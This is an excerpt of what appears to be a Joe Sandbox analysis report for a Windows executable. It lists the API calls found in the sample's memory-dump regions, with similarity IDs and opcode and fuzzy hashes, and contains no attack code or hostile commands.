  • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
  • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
  • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
• GetCaretPos.USER32(?), ref: 00484F13
• ClientToScreen.USER32(00000000,?), ref: 00484F4E
• GetForegroundWindow.USER32 ref: 00484F54
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
• Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
• Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
• Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• GetCursorPos.USER32(?), ref: 0048C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
• GetCursorPos.USER32(?), ref: 0048C534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
• Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
• Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
• Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
APIs
  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
  • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
  • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
  • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
• _memcmp.LIBCMT ref: 004586C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
• HeapFree.KERNEL32(00000000), ref: 00458703
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
• Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
• Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
• Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
APIs
• __setmode.LIBCMT ref: 004209AE
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
• _fprintf.LIBCMT ref: 004209E5
• OutputDebugStringW.KERNEL32(?), ref: 00455DBB
  • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
• __setmode.LIBCMT ref: 00420A1A
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
• Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
• Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
• Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
• Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
  • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
  • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
• Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
• Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
• Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
APIs
• _free.LIBCMT ref: 00435101
  • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
  • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
  • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 614378929-0
APIs
• _memset.LIBCMT ref: 004044CF
  • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
  • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
  • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
• KillTimer.USER32(?,00000001,?,?), ref: 00404524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
APIs
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
• gethostbyname.WSOCK32(?,?,?), ref: 00476399
• WSAGetLastError.WSOCK32(00000000), ref: 004763A4
• _memmove.LIBCMT ref: 004763D1
• inet_ntoa.WSOCK32(?), ref: 004763DC
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
• GetClientRect.USER32(?,?), ref: 0043B5FB
• GetCursorPos.USER32(?), ref: 0043B605
• ScreenToClient.USER32(?,?), ref: 0043B610
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AB15D8,00000000,00000000,?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue), ref: 00AB21BD
• GetLastError.KERNEL32(?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue,00AC6FC4,FlsSetValue,00000000,00000364,?,00AB192D), ref: 00AB21C9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AB2132,00AB15D8,00000000,00000000,00000000,?,00AB2283,00000006,FlsSetValue,00AC6FC4,FlsSetValue,00000000), ref: 00AB21D7
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                  • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
APIs
• GetWindowRect.USER32(?,?), ref: 0048B2E4
• ScreenToClient.USER32(?,?), ref: 0048B2FC
• ScreenToClient.USER32(?,?), ref: 0048B320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
• Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
• Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
• Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00466BE6
  • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
• _memmove.LIBCMT ref: 00466C09
• _memset.LIBCMT ref: 00466C16
• LeaveCriticalSection.KERNEL32(?), ref: 00466C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
• Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
• Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
• Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
APIs
• GetSysColor.USER32(00000008), ref: 00402231
• SetTextColor.GDI32(?,000000FF), ref: 0040223B
• SetBkMode.GDI32(?,00000001), ref: 00402250
• GetStockObject.GDI32(00000005), ref: 00402258
• GetWindowDC.USER32(?,00000000), ref: 0043BE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
• GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
• GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
• ReleaseDC.USER32(?,00000000), ref: 0043BEED
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
• Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
• Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
• Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
APIs
• GetCurrentThread.KERNEL32 ref: 0045871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
• Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
• Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
• Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
Strings
Similarity
• API ID:
• String ID: %I
• API String ID: 0-63094095
• Opcode ID: bee15131814e39812dc00af0912bda8edef71e582df47ac87d3b6ac4542ede2d
• Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
• Opcode Fuzzy Hash: bee15131814e39812dc00af0912bda8edef71e582df47ac87d3b6ac4542ede2d
• Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
APIs
Strings
Similarity
• API ID: __itow_s
• String ID: xbL$xbL
• API String ID: 3653519197-3351732020
• Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
• Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
• Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
• Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 0-2276729525
                                                                                                                                                  • Opcode ID: 7a29594973d756f24389713ff73510914e374535b864d70a4ce6aa1e99bec0a5
                                                                                                                                                  • Instruction ID: f0afb2654d63f1881da9b358e978d411930ea8af1e1b104ce25fc08d16ec7b74
                                                                                                                                                  • Opcode Fuzzy Hash: 7a29594973d756f24389713ff73510914e374535b864d70a4ce6aa1e99bec0a5
                                                                                                                                                  • Instruction Fuzzy Hash: 8151AD71A081058ECB29BB58DE117FA77B8DB41750F608D3CE8D5432EAEB358CD29B42
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                  • String ID: LPT
                                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                                  • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                  • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                                                                                  • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                  • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                  • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                  • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                                                                                  • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                  • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID: DdL$DdL
                                                                                                                                                  • API String ID: 1473721057-91670653
                                                                                                                                                  • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                  • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                                                                                                  • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                  • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0047259E
                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                                  • String ID: |
                                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                                  • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                                                                                  • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                                                                                  • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                                                                                  • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                  • Opcode ID: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                  • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                                                                                  • Opcode Fuzzy Hash: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                  • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462911
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                                                                                  Strings
